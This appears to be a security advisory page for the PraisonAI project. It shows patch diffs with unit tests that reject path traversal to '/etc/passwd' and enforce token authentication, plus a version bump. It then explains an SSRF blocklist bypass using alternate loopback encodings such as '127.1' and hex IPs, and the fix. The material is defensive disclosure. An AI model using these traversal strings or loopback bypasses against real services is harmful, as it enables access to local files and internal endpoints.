src/praisonai/tests/unit/mcp_server/test_cli_tools_path_hardening.py+21 −0 added@@ -0,0 +1,21 @@ +"""MCP CLI tools must not read arbitrary filesystem paths.""" + +from __future__ import annotations + +import pytest + + +def test_resolve_cwd_yaml_rejects_traversal(tmp_path, monkeypatch): + monkeypatch.chdir(tmp_path) + from praisonai.mcp_server.adapters import cli_tools + + (tmp_path / "workflow.yaml").write_text("framework: test\ntopic: t\n") + + path = cli_tools._resolve_cwd_yaml_path("workflow.yaml") + assert path.name == "workflow.yaml" + + with pytest.raises(ValueError): + cli_tools._resolve_cwd_yaml_path("../../etc/passwd") + + with pytest.raises(ValueError): + cli_tools._resolve_cwd_yaml_path("/etc/passwd")
src/praisonai/tests/unit/test_call_server_auth.py+40 −0 added@@ -0,0 +1,40 @@ +"""Call server agent API must not fail open without CALL_SERVER_TOKEN.""" + +from __future__ import annotations + +import importlib +import os + +import pytest + +pytest.importorskip("fastapi") + + +@pytest.mark.asyncio +async def test_verify_token_requires_token_by_default(monkeypatch): + monkeypatch.delenv("CALL_SERVER_TOKEN", raising=False) + monkeypatch.delenv("PRAISONAI_CALL_AUTH", raising=False) + + mod = importlib.import_module("praisonai.api.agent_invoke") + importlib.reload(mod) + + class _Req: + query_params = {} + + with pytest.raises(Exception) as exc: + await mod.verify_token(_Req(), authorization=None) + assert "CALL_SERVER_TOKEN" in str(exc.value) + + +@pytest.mark.asyncio +async def test_verify_token_optout(monkeypatch): + monkeypatch.delenv("CALL_SERVER_TOKEN", raising=False) + monkeypatch.setenv("PRAISONAI_CALL_AUTH", "disabled") + + mod = importlib.import_module("praisonai.api.agent_invoke") + importlib.reload(mod) + + class _Req: + query_params = {} + + await mod.verify_token(_Req(), authorization=None)
a72e156c4d01Release v4.6.40
12 files changed · +13 −13
docker/Dockerfile.chat+1 −1 modified@@ -16,7 +16,7 @@ RUN mkdir -p /root/.praison # Install Python packages (using latest versions) RUN pip install --no-cache-dir \ praisonai_tools \ - "praisonai>=4.6.39" \ + "praisonai>=4.6.40" \ "praisonai[chat]" \ "embedchain[github,youtube]"
docker/Dockerfile.dev+1 −1 modified@@ -20,7 +20,7 @@ RUN mkdir -p /root/.praison # Install Python packages (using latest versions) RUN pip install --no-cache-dir \ praisonai_tools \ - "praisonai>=4.6.39" \ + "praisonai>=4.6.40" \ "praisonai[ui]" \ "praisonai[chat]" \ "praisonai[realtime]" \
docker/Dockerfile.ui+1 −1 modified@@ -16,7 +16,7 @@ RUN mkdir -p /root/.praison # Install Python packages (using latest versions) RUN pip install --no-cache-dir \ praisonai_tools \ - "praisonai>=4.6.39" \ + "praisonai>=4.6.40" \ "praisonai[ui]" \ "praisonai[crewai]"
src/praisonai-agents/pyproject.toml+1 −1 modified@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta" [project] name = "praisonaiagents" -version = "1.6.39" +version = "1.6.40" description = "Praison AI agents for completing complex tasks with Self Reflection Agents" readme = "README.md" requires-python = ">=3.10"
src/praisonai-agents/uv.lock+1 −1 modified@@ -2992,7 +2992,7 @@ wheels = [ [[package]] name = "praisonaiagents" -version = "1.6.39" +version = "1.6.40" source = { editable = "." } dependencies = [ { name = "aiohttp" },
src/praisonai-platform/pyproject.toml+1 −1 modified@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta" [project] name = "praisonai-platform" -version = "0.1.2" +version = "0.1.4" description = "Platform layer for PraisonAI — workspace, auth, issues, projects" readme = "README.md" requires-python = ">=3.10"
src/praisonai-platform/uv.lock+1 −1 modified@@ -1208,7 +1208,7 @@ wheels = [ [[package]] name = "praisonai-platform" -version = "0.1.2" +version = "0.1.4" source = { editable = "." } dependencies = [ { name = "aiosqlite" },
src/praisonai/praisonai/deploy.py+1 −1 modified@@ -57,7 +57,7 @@ def create_dockerfile(self): file.write("FROM python:3.11-slim\n") file.write("WORKDIR /app\n") file.write("COPY . .\n") - file.write("RUN pip install flask praisonai==4.6.39 gunicorn markdown\n") + file.write("RUN pip install flask praisonai==4.6.40 gunicorn markdown\n") file.write("EXPOSE 8080\n") file.write('CMD ["gunicorn", "-b", "0.0.0.0:8080", "api:app"]\n')
src/praisonai/praisonai.rb+2 −2 modified@@ -3,8 +3,8 @@ class Praisonai < Formula desc "AI tools for various AI applications" homepage "https://github.com/MervinPraison/PraisonAI" - url "https://github.com/MervinPraison/PraisonAI/archive/refs/tags/v4.6.39.tar.gz" - sha256 `curl -sL https://github.com/MervinPraison/PraisonAI/archive/refs/tags/v4.6.39.tar.gz | shasum -a 256`.split.first + url "https://github.com/MervinPraison/PraisonAI/archive/refs/tags/v4.6.40.tar.gz" + sha256 `curl -sL https://github.com/MervinPraison/PraisonAI/archive/refs/tags/v4.6.40.tar.gz | shasum -a 256`.split.first license "MIT" depends_on "python@3.11"
src/praisonai/praisonai/version.py+1 −1 modified@@ -1 +1 @@ -__version__ = "4.6.39" \ No newline at end of file +__version__ = "4.6.40" \ No newline at end of file
src/praisonai/pyproject.toml+1 −1 modified@@ -12,7 +12,7 @@ dependencies = [ "rich>=13.7", "markdown>=3.5", "pyparsing>=3.0.0", - "praisonaiagents>=1.6.39", + "praisonaiagents>=1.6.40", "python-dotenv>=0.19.0", "litellm>=1.83.14,<2", "PyYAML>=6.0",
src/praisonai/uv.lock+1 −1 modified@@ -4841,7 +4841,7 @@ wheels = [ [[package]] name = "praisonaiagents" -version = "1.6.39" +version = "1.6.40" source = { directory = "../praisonai-agents" } dependencies = [ { name = "aiohttp" },
Vulnerability mechanics
Root cause
"Missing hostname normalization and IP resolution in URL validation allows alternate loopback encodings to bypass the blocklist."
Attack vector
An attacker who can influence URLs passed to `scrape_page`, `crawl`, or `extract_text` can bypass the weak blocklist by using alternate loopback encodings such as `http://127.1:8765/`, `http://0x7f000001:8765/`, or `http://localhost.:8765/`. These forms pass the string-based validation but are interpreted as loopback addresses by the HTTP client, reaching local-only services. [ref_id=1] [ref_id=2]
Affected code
The vulnerability resides in `praisonaiagents/tools/spider_tools.py` within the `_validate_url` method. The validation only blocks exact host strings like `localhost` and `127.0.0.1`, failing to normalize hostnames or parse numeric IPv4 variants before the request is made via `requests.Session.get()`. [ref_id=1] [ref_id=2]
What the fix does
The patch replaces the weak exact-string blocklist in `_validate_url` with a new `_host_is_blocked()` function that normalizes the hostname (lowercasing, stripping trailing dots), resolves numeric IPv4 variants (decimal, hex, octal, and shorthand like `127.1`), and checks the resolved IP against `ipaddress` properties for loopback, private, reserved, and link-local ranges. It also blocks well-known metadata endpoints and internal DNS suffixes. [patch_id=3131099]
Preconditions
- inputThe attacker must be able to supply URLs to the spider_tools functions (scrape_page, crawl, extract_text).
- configA loopback-only HTTP service must be listening on the target host/port.
Generated on May 29, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.